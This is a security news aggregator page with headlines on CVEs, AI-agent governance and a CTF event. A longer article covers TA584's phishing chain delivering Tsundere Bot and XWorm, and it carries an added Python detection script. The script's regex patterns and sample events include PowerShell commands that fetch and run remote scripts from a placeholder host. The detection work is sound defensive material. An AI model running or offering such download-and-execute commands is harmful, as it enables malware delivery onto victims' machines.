Aggregator
National Computer Virus Emergency Response Center detects 72 mobile apps that illegally collect and use personal information
TA584 hacking group uses Tsundere Bot and XWorm to carry out ransomware attacks
Allama: Open-source AI security automation
Allama is an open-source security automation platform that lets teams build visual workflows for threat detection and response. It includes integrations with 80+ types of tools and services typical in security operations, including SIEM systems, endpoint detection and response products, identity providers, and ticketing systems. The project supports alerts from many sources. Once alerts enter the platform, it uses a workflow engine and AI agents to enrich, triage, and act on the data. The integrations …
The post Allama: Open-source AI security automation appeared first on Help Net Security.
JVN: Unquoted file path vulnerability in Oki Electric Industry products and their OEM products
Linux 6.19 released
AI agents behave like users, but don’t follow the same rules
Security and governance approaches to autonomous AI agents rely on static credentials, inconsistent controls, and limited visibility. Securing these agents requires the same rigor and traceability applied to human users, according to Cloud Security Alliance’s Securing Autonomous AI Agents report.
Agents scale faster than governance frameworks
Autonomous AI agents act on behalf of humans, accessing data and making decisions with business impact. Organizations are deploying them across production environments, pilots, tests, and broader AI or …
The post AI agents behave like users, but don’t follow the same rules appeared first on Help Net Security.
“Cash only, sorry.” A cyberattack took America back to the ’90s
CVE-2026-2211 | code-projects Online Music Site 1.0 AdminDeleteCategory.php ID sql injection
CVE-2026-2212 | code-projects Online Music Site 1.0 AdminEditCategory.php ID sql injection
Shattering the Edge: Cisco Talos Unmasks “DKnife,” the 7-Module Framework Hijacking Your Router
Security analysts at Cisco Talos have unmasked a clandestine offensive platform that has operated surreptitiously within network infrastructure
The post Shattering the Edge: Cisco Talos Unmasks “DKnife,” the 7-Module Framework Hijacking Your Router appeared first on Penetration Testing Tools.
Weekly Update 490
A big "thank you" to everyone who helped me troubleshoot the problem with my "Print Screen" button on the new PC. Try as we all might, none of us could figure out why it refused to bind to SnagIt and instead insisted on dumping the entire
Vault Lines vs. Fault Lines: Europe’s 2026 Mandate to Break Free from Big Tech Dependencies
The European Union is increasingly championing the doctrine of “digital sovereignty,” articulating a pressing necessity to attenuate its
The post Vault Lines vs. Fault Lines: Europe’s 2026 Mandate to Break Free from Big Tech Dependencies appeared first on Penetration Testing Tools.
What hides in the galaxy’s obscured center? James Webb discovered an entire factory of precursor molecules of life
LA CTF 2026
Date: 07 Feb. 2026, 02:00 — 09 Feb. 2026, 02:00 UTC
Format: Jeopardy
On-line
Official URL: https://lac.tf/
Rating weight: 53.58
Event organizers: PBR | UCLA
Initial access hackers use Tsundere Bot to breach networks, possibly paving the way for ransomware attacks
A highly active initial access broker tracked as TA584 has recently been observed using the Tsundere Bot and XWorm remote access trojans to gain access to target networks, creating the conditions for follow-on ransomware attacks.
Proofpoint researchers have tracked TA584’s activity since 2020. They note that the threat group has recently expanded the scale of its attacks significantly and built a persistent attack chain designed to evade static detection.
The Tsundere Bot malware was first publicly disclosed by Kaspersky last year; researchers attributed it to a Russian-speaking threat group linked to the 123 Stealer information stealer. Although the malware’s original purpose and distribution method were unclear, Proofpoint says it can be used for information gathering, data theft, lateral movement, and deployment of additional malicious payloads.
Because researchers have observed TA584 using the malware in attacks, the research team assesses with high confidence that hosts infected with Tsundere Bot are very likely to become targets of follow-on ransomware attacks.
In late 2025, TA584’s total attack volume had increased twofold compared with the first quarter of the same year, and its targeting expanded from the traditional regions of North America, the UK and Ireland to Germany, other European countries, and Australia.
TA584 activity volume
The group’s current mainstream attack chain works as follows: hundreds of hijacked, aged email accounts are used to send phishing emails through SendGrid and Amazon Simple Email Service (SES); the emails contain target-specific links protected by geofencing and IP filtering, and the redirect chain usually routes through a third-party traffic distribution system (TDS) such as Keitaro.
Users who pass the filters land on a CAPTCHA page and are then redirected to a ClickFix page that lures them into running a PowerShell command locally.
CAPTCHA (left) and ClickFix (right) pages
That command downloads and executes an obfuscated script that loads XWorm or Tsundere Bot into memory, while redirecting the browser to a legitimate website to mask the malicious activity.
PowerShell script
Proofpoint says that over the years TA584 has used a large number of payloads, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike and DCRAT; DCRAT was still used in one attack in 2025.
Tsundere Bot is a malware-as-a-service (MaaS) platform with backdoor and loader capabilities. It runs on a Node.js runtime, which is deployed to the victim’s device automatically by an installer generated from its command-and-control (C2) panel.
The malware uses a modified EtherHiding technique to retrieve the C2 server address from the Ethereum blockchain, and the installer also embeds a hardcoded backup address in case the primary address becomes unavailable.
The malware communicates with the C2 server over the WebSocket protocol and includes a system locale check: if the device uses a language of a Commonwealth of Independent States (CIS) member country (mainly Russian), it terminates immediately.
In addition, Tsundere Bot collects system information to profile the infected host, can execute arbitrary JavaScript code sent down from the C2 server, and can turn the infected host into a SOCKS proxy. The malware platform also has a built-in marketplace where trojans can be bought and sold directly.
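As an added detection example (not part of the original article or of Proofpoint’s report), the Python script below turns the chain described above into two endpoint-telemetry checks: a PowerShell process launched from an interactive parent with a download cradle, in-memory execution and evasion flags (the ClickFix step), and a node.exe process spawned by that PowerShell process (the Node.js runtime Tsundere Bot depends on). The process events, host names, PIDs, the example.invalid URL and the indicator regexes are all constructed for illustration; none of them are IoCs from the report.

```python
"""Triage constructed process-creation events for a ClickFix -> PowerShell -> Node.js chain."""
import json
import re

# Generic PowerShell download-cradle / execution idioms that defenders commonly alert on.
# These are illustrative patterns, not indicators taken from the TA584 report.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|net\.webclient", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression", re.I)
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(?:p|xecutionpolicy)\s+bypass"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)
# A ClickFix victim pastes the command into the Run dialog or a console by hand, so the
# PowerShell process hangs off an interactive parent rather than a service or installer.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def clickfix_indicators(event):
    """Return the ClickFix-style indicators present in one process-creation event."""
    if event.get("image", "").lower() not in POWERSHELL:
        return []
    cmd = event.get("command_line", "")
    hits = []
    if event.get("parent_image", "").lower() in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
    if DOWNLOAD_RE.search(cmd):
        hits.append("download_cradle")
    if EXEC_RE.search(cmd):
        hits.append("in_memory_exec")
    if EVASION_RE.search(cmd):
        hits.append("evasion_flags")
    return hits


def node_children_of_powershell(events):
    """Return node.exe events whose parent (same host, parent_pid) is a PowerShell process."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    found = []
    for e in events:
        if e.get("image", "").lower() != "node.exe":
            continue
        parent = by_key.get((e["host"], e.get("parent_pid")))
        if parent and parent.get("image", "").lower() in POWERSHELL:
            found.append(e)
    return found


def triage(jsonl):
    """Parse JSON-lines process events and return a list of alerts with severity."""
    events = [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]
    alerts = []
    for e in events:
        hits = clickfix_indicators(e)
        # Download plus in-memory execution is the core; extra indicators raise severity.
        if "download_cradle" in hits and "in_memory_exec" in hits:
            alerts.append({"host": e["host"], "pid": e["pid"], "rule": "clickfix_powershell",
                           "severity": "high" if len(hits) >= 3 else "medium",
                           "indicators": hits})
    for e in node_children_of_powershell(events):
        alerts.append({"host": e["host"], "pid": e["pid"], "rule": "node_spawned_by_powershell",
                       "severity": "high", "indicators": ["node_child_of_powershell"]})
    return alerts


# Constructed sample telemetry (hosts, PIDs, paths and URL are made up for this example).
SAMPLE_EVENTS = r"""
{"host": "ws-a", "pid": 100, "parent_pid": 1, "image": "explorer.exe", "parent_image": "wininit.exe", "command_line": "explorer.exe"}
{"host": "ws-a", "pid": 200, "parent_pid": 100, "image": "powershell.exe", "parent_image": "explorer.exe", "command_line": "powershell -w hidden -nop -ep bypass -c \"iex (iwr 'https://example.invalid/verify' -UseBasicParsing).Content\""}
{"host": "ws-a", "pid": 300, "parent_pid": 200, "image": "node.exe", "parent_image": "powershell.exe", "command_line": "node.exe C:\\Users\\Public\\app\\index.js"}
{"host": "ws-b", "pid": 400, "parent_pid": 50, "image": "powershell.exe", "parent_image": "services.exe", "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"}
{"host": "ws-b", "pid": 500, "parent_pid": 60, "image": "powershell.exe", "parent_image": "explorer.exe", "command_line": "powershell Get-ChildItem"}
{"host": "ws-c", "pid": 600, "parent_pid": 70, "image": "powershell.exe", "parent_image": "svchost.exe", "command_line": "powershell -c \"iex (irm https://example.invalid/install.ps1)\""}
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Run stand-alone it prints three alerts: a high-severity ClickFix hit for the hidden, profile-less PowerShell launched from explorer.exe on ws-a, a medium-severity hit for the bare download-and-execute on ws-c (a pattern some software installers also use, hence the lower severity), and a node.exe child of that first PowerShell process. The routine backup script and the interactive Get-ChildItem on ws-b produce nothing.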
JVN: Multiple vulnerabilities in Yokogawa Electric FAST/TOOLS
The 8-Minute Admin: How AI-Powered “LLMjacking” Crushed AWS Defenses in Record Time
An adversary successfully infiltrated an Amazon Web Services cloud environment, escalating to full administrative privileges in a mere
The post The 8-Minute Admin: How AI-Powered “LLMjacking” Crushed AWS Defenses in Record Time appeared first on Penetration Testing Tools.
The Breaking Bad effect: cancer diagnoses linked to a rise in criminal behavior
The Fatal Screensaver: ReliaQuest Unmasks Phishing That Uses .scr Files to Decapitate EDR
Security analysts at ReliaQuest have unmasked a sophisticated phishing campaign wherein adversaries secrete remote access mechanisms within an
The post The Fatal Screensaver: ReliaQuest Unmasks Phishing That Uses .scr Files to Decapitate EDR appeared first on Penetration Testing Tools.